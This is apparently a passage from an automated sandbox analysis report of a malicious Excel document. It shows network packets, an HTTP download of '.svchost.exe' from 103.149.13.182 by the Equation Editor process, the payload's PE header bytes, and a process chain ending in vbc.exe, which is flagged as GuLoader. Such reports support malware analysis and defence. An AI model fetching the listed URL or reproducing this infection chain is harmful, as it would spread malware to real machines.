      May 10, 2022 22:16:59.114252090 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.114306927 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.114314079 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.114343882 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.114351988 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.114360094 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.114399910 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.114876986 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.114909887 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.114937067 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.114943027 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.114959955 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.114964962 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.114978075 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.114996910 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.343431950 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.343465090 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.343499899 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.343523026 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.343524933 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.343548059 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.343548059 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.343552113 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.343559027 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.343569994 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.343578100 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.343592882 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.343609095 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.343615055 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.343626022 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.343637943 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.343655109 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.343661070 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.343672037 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.343683004 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.343696117 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.343707085 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.343718052 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.343724012 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.343750000 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.343759060 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.343770027 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.343785048 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.343791962 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.343805075 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.343827009 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.346543074 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.572252035 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.572293997 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.572316885 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.572329044 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.572339058 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.572355032 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.572360039 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.572364092 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.572367907 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.572387934 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.572396040 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.572412014 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.572421074 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.572433949 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.572448969 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.572454929 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.572464943 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.572498083 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.572503090 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.572524071 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.572532892 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.572541952 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.572566032 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.572582960 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.572588921 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.572591066 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.572606087 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.572611094 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.572617054 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.572633028 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.572634935 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.572662115 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.572668076 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.572690010 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.572706938 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.572721004 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.572721958 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.572743893 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.572750092 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.572768927 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.572788000 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:59.572801113 CEST8049173103.149.13.182192.168.2.22
      • 103.149.13.182
      Session IDSource IPSource PortDestination IPDestination PortProcess
      0192.168.2.2249173103.149.13.18280C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      TimestampkBytes transferredDirectionData
      May 10, 2022 22:16:58.655296087 CEST2OUTGET /365space/.svchost.exe HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 103.149.13.182
      Connection: Keep-Alive
      May 10, 2022 22:16:58.885287046 CEST3INHTTP/1.1 200 OK
      Date: Tue, 10 May 2022 20:16:58 GMT
      Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
      Last-Modified: Mon, 09 May 2022 21:26:38 GMT
      ETag: "51bf8-5de9add0f38f0"
      Accept-Ranges: bytes
      Content-Length: 334840
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: application/x-msdownload
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 60 47 ec 40 0e 14 ec 40 0e 14 ec 40 0e 14 2f 4f 51 14 ee 40 0e 14 ec 40 0f 14 49 40 0e 14 2f 4f 53 14 e3 40 0e 14 b8 63 3e 14 e0 40 0e 14 2b 46 08 14 ed 40 0e 14 52 69 63 68 ec 40 0e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 68 9a 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 12 3a 00 00 08 00 00 0a 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 b5 2e 05 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 60 3d 00 08 59 01 00 00 00 00 00 00 00 00 00 c8 fb 04 00 30 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 66 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 eb 39 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 d0 02 00 00 90 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 08 59 01 00 00 60 3d 00 00 5a 01 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$!`G@@@/OQ@@I@/OS@c>@+F@Rich@PELhOah:5@>.@`=Y0 .textpfh `.rdatal@@.datax9@.ndata:.rsrcY`=Z@@


      Click to jump to process

      Target ID:0
      Start time:22:16:18
      Start date:10/05/2022
      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Imagebase:0x13f900000
      File size:28253536 bytes
      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:2
      Start time:22:16:44
      Start date:10/05/2022
      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      Wow64 process (32bit):true
      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Imagebase:0x400000
      File size:543304 bytes
      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:4
      Start time:22:16:49
      Start date:10/05/2022
      Path:C:\Users\Public\vbc.exe
      Wow64 process (32bit):true
      Commandline:"C:\Users\Public\vbc.exe"
      Imagebase:0x400000
      File size:334840 bytes
      MD5 hash:78003B1DD8F6229A23A13087082E259C
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Yara matches:
      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.1176745536.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
      Antivirus matches:
      • Detection: 15%, ReversingLabs
      Reputation:low

      No disassembly